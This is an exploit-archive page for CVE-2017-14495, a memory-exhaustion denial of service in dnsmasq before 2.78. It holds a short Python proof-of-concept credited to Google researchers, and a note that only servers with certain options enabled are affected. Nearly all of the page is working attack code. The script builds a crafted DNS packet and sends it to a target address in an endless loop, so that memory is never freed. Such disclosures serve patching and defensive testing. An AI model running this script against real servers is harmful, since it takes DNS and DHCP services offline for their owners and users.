Dnsmasq < 2.78 - Lack of free() Denial of Service

2017-10-02 21:05:04

'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14495.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html

dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.

'''

#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# Fermin J. Serna <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="70161a0315021e1130171f1f171c155e131f1d">[email protected]</a>>
# Felix Wilhelm <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="2e48594742464b42436e49414149424b004d4143">[email protected]</a>>
# Gabriel Campana <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="accbcedec0eccbc3c3cbc0c982cfc3c1">[email protected]</a>>
# Kevin Hamacher <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="cfa7aea2aeaca7aabd8fa8a0a0a8a3aae1aca0a2">[email protected]</a>>
# Gynvael Coldwin <<a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="43243a2d3522262f03242c2c242f266d202c2e">[email protected]</a>>
# Ron Bowes - Xoogler :/

import socket
import sys


def oom():
data = '''01 0d 08 1b 00 01 00 00 00 00 00 02 00 00 29 04
00 00 29 00 00 00 03 00 00 01 13 00 08 01 13 79
00 00 00 00 00
'''.replace(' ', '').replace('\n', '').decode('hex')
data = data.replace('\x00\x01\x13\x00', '\x7f\x00\x00\x01')
return data

if __name__ == '__main__':
if len(sys.argv) != 3:
print 'Usage: %s <ip> <port>' % sys.argv[0]
sys.exit(0)

ip = sys.argv[1]
port = int(sys.argv[2])

packet = oom()

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
while True:
s.sendto(packet, (ip, port))
#break
s.close()
<script>!function(e,t,r,n,c,a,l){function i(t,r){return r=e.createElement('div'),r.innerHTML='<a href="'+t.replace(/"/g,'"')+'"></a>',r.childNodes[0].getAttribute('href')}function o(e,t,r,n){for(r='',n='0x'+e.substr(t,2)|0,t+=2;t<e.length;t+=2)r+=String.fromCharCode('0x'+e.substr(t,2)^n);return i(r)}try{for(c=e.getElementsByTagName('a'),l='/cdn-cgi/l/email-protection#',n=0;n<c.length;n++)try{(t=(a=c[n]).href.indexOf(l))>-1&&(a.href='mailto:'+o(a.href,t+l.length))}catch(e){}for(c=e.querySelectorAll('.__cf_email__'),n=0;n<c.length;n++)try{(a=c[n]).parentNode.replaceChild(e.createTextNode(o(a.getAttribute('data-cfemail'),0)),a)}catch(e){}}catch(e){}}(document);</script>

Fixes

No fixes

In order to submit a new fix you need to be registered.